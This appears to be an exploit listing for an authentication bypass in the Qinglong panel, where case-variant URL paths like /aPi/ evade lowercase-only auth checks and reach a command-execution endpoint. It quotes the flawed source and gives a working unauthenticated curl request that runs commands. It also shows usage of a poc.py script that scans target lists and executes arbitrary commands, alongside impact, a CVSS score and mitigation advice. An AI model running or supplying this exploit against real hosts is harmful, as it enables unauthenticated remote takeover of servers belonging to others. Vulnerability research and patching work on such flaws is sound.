Share
## https://sploitus.com/exploit?id=920CC091-4FA1-5814-951D-DC664E52736B
# Qinglong Auth Bypass to Command Execution

A proof-of-concept exploiting a path canonicalization / case-handling weakness in Qinglong API routing can allow an unauthenticated actor to reach a privileged command execution endpoint (`/api/system/command-run`) through case-variant paths.

If exposed over the network, this may result in **unauthenticated remote command execution**.

## Vulnerability

The bypass comes from an inconsistent case-sensitive check in auth logic, combined with case-insensitive route matching in Express.

### 1. Whitelist regex in `back/loaders/express.ts`
```ts
path: [...config.apiWhiteList, /^\/(?!api\/).*/]
```

This regex strictly checks lowercase `api`.  
Any path not starting with lowercase `/api/` can bypass the JWT check path.

### 2. Custom auth middleware uses strict lowercase prefix checks
```ts
if (!['/open/', '/api/'].some((x) => req.path.startsWith(x))) {
  return next();
}
```

The middleware also performs strict lowercase matching with `req.path.startsWith(...)`.  
So paths like `/API/...` do not match `/api/` and are directly allowed.

### 3. Express routing is case-insensitive by default
```ts
app.use(config.api.prefix, routes());
```

Even if auth checks reject only lowercase patterns, Express can still resolve `/API/...` to the same handler family as `/api/...` (default case-insensitive behavior), creating an auth bypass.

## Affected Versions
- Affected versions: **Prior to 2.20.1**
- Fixed version: **Pending**

## PoC 

```bash
curl -X PUT "http://localhost:5700/aPi/system/command-run" \
> -H "Content-Type: application/json" \
> -d '{"command": "id"}'
```
## Automation `poc.py`

- Detects Qinglong target (`/api/health`, `/api/system`)
- Tests known case-variant command-run paths
- Executes the command supplied by `-c` and reports response

Single target:
```bash
python3 poc.py -t  -c 'whoami'
```

Target list:
```bash
python3 poc.py -l targets.txt -c 'whoami' --json -o result.json
```
## Impact
Successful exploitation can allow:
- Remote command execution on the Qinglong host context
- Disclosure or modification of application/runtime data
- Potential lateral movement depending on host privileges and network design

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - Critical 10.0

## Mitigation
- Upgrade to the fixed Qinglong release when available.
- Normalize URL paths before authorization checks.
- Enforce strict, case-consistent route handling in middleware and reverse proxies.
- Restrict management/API exposure to trusted networks only.
- Add regression tests for case-variant endpoint access.

## Reference

https://github.com/whyour/qinglong/issues/2934

## Disclamer
This tool is for authorized security testing only. Unauthorized access to computer systems is illegal.